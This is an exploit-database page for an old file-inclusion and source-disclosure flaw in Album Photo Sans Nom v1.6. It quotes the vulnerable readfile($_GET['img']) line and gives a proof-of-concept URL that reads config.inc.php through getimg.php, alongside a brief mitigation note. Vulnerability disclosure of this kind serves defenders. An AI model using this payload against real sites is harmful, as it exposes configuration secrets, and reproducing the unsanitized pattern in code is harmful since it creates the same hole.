header-logo
Suggest Exploit
vendor:
Album Photo Sans Nom
by:
DarkFig
7,5
CVSS
HIGH
File Inclusion
98
CWE
Product Name: Album Photo Sans Nom
Affected Version From: Album Photo Sans Nom v1.6
Affected Version To: Album Photo Sans Nom v1.6
Patch Exists: NO
Related CWE: N/A
CPE: a:bezut:album_photo_sans_nom:1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

7 php scripts File Inclusion Vuln / Source disclosure

A vulnerability in Album Photo Sans Nom v1.6 allows an attacker to include arbitrary files via the 'img' parameter in the 'getimg.php' script. This can be exploited to disclose the source code of the vulnerable script by passing the path to the 'config.inc.php' file.

Mitigation:

Input validation should be used to ensure that user-supplied input is not used to include files from arbitrary locations.
Source

Exploit-DB raw data:

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: Album Photo Sans Nom v1.6
# Download....: http://scripts.bezut.info/releases/APSN/albumV1.6.tgz
# Poc.........: http://victim.pl/getimg.php?img=config.inc.php
# Vuln.code...: Line 47, readfile($_GET['img']);

# milw0rm.com [2006-10-10]

Navigation

Suggest Exploit

Services By CQR